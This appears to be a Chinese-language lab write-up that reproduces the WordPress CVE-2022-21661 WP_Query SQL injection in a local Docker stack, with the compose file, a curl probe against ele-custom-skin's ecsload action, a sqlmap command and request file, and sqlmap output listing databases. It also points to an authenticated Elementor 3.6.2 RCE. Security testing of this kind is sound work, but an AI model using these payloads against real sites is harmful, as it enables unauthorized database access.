docker WellingtonEspindula/SSI-CVE-2022-21661 sqlmap+json一键梭哈

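# Lab set-up on the Docker host. wordpress:5.8.1 is pulled on purpose: it is
# unpatched for CVE-2022-21661 (fixed in WordPress 5.8.3). Keep this stack on a
# host you control and do not publish its ports beyond the machine.
cd /tmp || exit 1
# Third-party lab repository: read its compose file and scripts before running them.
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
# Install docker-compose in the foreground. The original backgrounded apt with
# "&", so the "docker-compose up" further down could run before the binary existed.
apt install -y docker-compose
docker pull mysql:5.7
docker pull wordpress:5.8.1
docker pull wordpress:cli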


root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii  docker-compose                       1.29.2-1                                all          define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# 

自定义 docker-compose.yml:下面是我修改后的版本,保存为 Gdocker-compose.yml。

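# Lab compose file for CVE-2022-21661 (WP_Query SQL injection). Everything in it
# is intentionally weak (default DB passwords, admin/admin, debug output on) so
# the injection is easy to observe. Published ports are bound to 127.0.0.1 so the
# vulnerable stack is reachable only from this host; the original published them
# on 0.0.0.0. Widen the bind address only on an isolated network.
version: "3.3"
services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    ports:
      # Loopback only. Nothing in this write-up needs the host port (the
      # connection test below uses docker exec), so it can also be removed.
      - "127.0.0.1:33060:3306"
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    healthcheck:
      # "$$" escapes compose's host-side interpolation so the container's own
      # MYSQL_USER / MYSQL_PASSWORD are used. With a single "$" compose reads the
      # (normally unset) host environment and substitutes empty strings.
      test: mysqladmin ping -h 127.0.0.1 -u $$MYSQL_USER --password=$$MYSQL_PASSWORD
      # NOTE(review): start_period is documented as a 3.4+ file-format field;
      # if compose rejects it under "3.3", raise the version or drop this line.
      start_period: 5s
      interval: 5s
      timeout: 5s
      retries: 55

  wordpress:
    depends_on:
      db:
        condition: service_healthy
    image: wordpress:5.8.1        # unpatched for CVE-2022-21661 (fixed in 5.8.3)
    ports:
      - "127.0.0.1:8000:80"       # matches --url below and the curl/sqlmap targets
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_TABLE_PREFIX: "wp_"
      WORDPRESS_DEBUG: 1
    volumes:
      - wp_data:/var/www/html

  wordpress-cli:
    depends_on:
      - db
      - wordpress
    image: wordpress:cli
    user: root                    # needed for the chown below, hence --allow-root
    stdin_open: true
    tty: true
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
    # Provisioning script. It is a folded scalar (newlines become spaces), so every
    # statement ends with ";" and no "#" comments may appear inside it. It:
    #  - waits until the wordpress container has written wp-config.php into the
    #    shared volume (the original "sleep 3" was a race);
    #  - installs WordPress with lab-only admin/admin credentials;
    #  - installs ele-custom-skin 3.1.3, whose "ecsload" AJAX action forwards the
    #    caller's tax_query into WP_Query (the request used later on this page);
    #  - chowns the tree to uid 33, the user Apache runs as in the wordpress image.
    #    The original "chmod -R 0777" was dropped: ownership alone is sufficient;
    #  - turns on WP_DEBUG_DISPLAY so SQL errors reach the HTTP response (this is
    #    what makes sqlmap's error-based technique work) and writes the debug log
    #    inside the web root, where it is downloadable as /aab.log. Lab only.
    #  - ends with "bash" so the container stays up with an interactive shell.
    command: >
      /bin/sh -c '
      id;
      until [ -f /var/www/html/wp-config.php ]; do sleep 1; done;
      wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
      wp --allow-root plugin install elementor  --version=3.5.0  --activate;
      wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
      wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
      wp --allow-root user create tom tom@tom.com          --user_pass="weakpassword";
      wp --allow-root user create leo leo@leo.com          --user_pass="strongpassword";
      wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
      chown -R 33:33 /var/www/html;
      wp config set WP_DEBUG true --raw --allow-root;
      wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
      wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
      bash;
      '
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data: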

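# Alternative to the "--version=3.5.0" line in the compose provisioning script.
# The SQL injection lives in WordPress core, so the Elementor version only has
# to be one ele-custom-skin works with; 3.6.2 additionally carries the separate
# authenticated RCE from exploit-db 50882, which can be tested in the same lab.
wp --allow-root plugin install elementor --version=3.6.2 --activate;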

Elementor 3.6.2 也可以用:本文的注入点在 WordPress 5.8.1 核心的 WP_Query(5.8.3 已修复),Elementor 只需与 ele-custom-skin 兼容即可;而 3.6.2 本身还有 exploit-db 50882 记录的认证 RCE,可以在同一环境里顺带测试。

#https://www.exploit-db.com/exploits/50882

#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)

启动3个docker:

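# Validate the compose file first (schema errors surface here rather than
# half-way through "up"), then start db, wordpress and wordpress-cli detached.
compose_file=/tmp/SSI-CVE-2022-21661/Gdocker-compose.yml
docker-compose -f "$compose_file" config -q || exit 1
docker-compose -f "$compose_file" up -d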

查看日志:

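# Follow the provisioning output. Addressing the service through compose avoids
# depending on the generated container name (<project>_wordpress-cli_1, where
# the project name is derived from the compose file's directory).
docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml logs -f wordpress-cli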

mysql容器连接测试:

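# Open a shell in the db container (service name instead of generated container name).
docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml exec db bash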

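# Run inside the db container. MYSQL_USER / MYSQL_PASSWORD are already in its
# environment (set in the compose file). Handing the password over via MYSQL_PWD
# keeps it out of the process list and shell history, unlike --password=... on
# the command line. Lab credentials, but the habit carries over to real hosts.
MYSQL_PWD="$MYSQL_PASSWORD" mysql -h 127.0.0.1 -u "$MYSQL_USER" -e "select now();"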

使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):

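# Unauthenticated probe of ele-custom-skin's "ecsload" AJAX action: the caller's
# tax_query (field=term_taxonomy_id, terms=[""]) is forwarded to WP_Query, which
# WordPress 5.8.1 does not sanitise (CVE-2022-21661). No cookie is sent.
# PROXY defaults to the Burp listener; set PROXY= (empty) to send directly.
# The hard-coded "Content-Length: 287" header was dropped: curl derives it from
# the body, and a stale value silently truncates or stalls the request once the
# payload changes. Host/Accept-Encoding/Connection headers copied from Burp were
# redundant with what curl and --compressed already send; -k is meaningless on http.
PROXY="${PROXY-http://127.0.0.1:8080/}"
proxy_args=()
[[ -n "$PROXY" ]] && proxy_args=(-x "$PROXY")
curl "${proxy_args[@]}" -i --compressed -X POST \
    -H 'User-Agent: python-requests/2.28.1' -H 'Accept: */*' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data-binary 'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
    'http://127.0.0.1:8000/wp-admin/admin-ajax.php'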

http://127.0.0.1:8080/ 是 Burp Suite 2022 开的 HTTP 代理,用来观察请求和响应;不需要抓包时去掉 -x 参数直接发送即可。

祭出大杀器sqlmap:

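rem sqlmap against the lab. -r replays rr2024.txt; the "*" in "1*" marks the
rem injection point. --prefix closes the parenthesised list the term lands in
rem and --suffix comments out the rest of the statement.
rem --technique=E (error-based) only works because the lab enables
rem WP_DEBUG_DISPLAY; against a target that hides errors use --technique=BT.
rem --proxy is optional and just routes traffic through Burp for inspection.
set "cmdpath2024=c:\Python310\python"
set "sqlmap2024=E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py"

"%cmdpath2024%" "%sqlmap2024%" -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23)  " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080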

# sqlmap 1.5.7.7#dev   ,  支持python3.10

rr2024.txt 内容如下(`1*` 中的 `*` 是 sqlmap 的自定义注入点标记;Content-Length 要与请求体实际长度一致):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close

action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}

得到结果:

web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress

其它辅助参考资料:

https://github.com/daniel616/CVE-2022-21661-Demo


#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate

#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate


#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json

#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip


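# Fetch hello-elementor theme zips for offline install. The original passed -k,
# which disables TLS certificate verification on archives that are later
# installed into the site; keep verification on and fail on HTTP errors.
cd /tmp || exit 1
for ver in 2.1.0 2.5.0 2.7.0; do
  curl -v4 --fail -O "https://downloads.wordpress.org/theme/hello-elementor.${ver}.zip"
done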




https://forum.butian.net/share/1324
漏洞简介
这是最近爆出的一个 WordPress SQL 注入漏洞(CVE-2022-21661,影响 5.8.3 之前的版本)。它本身不是一个可以直接打的洞,而是核心类 WP_Query 的缺陷:tax_query 使用 field=term_taxonomy_id 时,传入的 terms 未经清洗就拼进了 SQL。只要插件或主题把用户可控的数据交给 WP_Query(本文里 ele-custom-skin 的 ecsload 接口就是如此),前台未登录和后台都可能触发,因此影响面不小。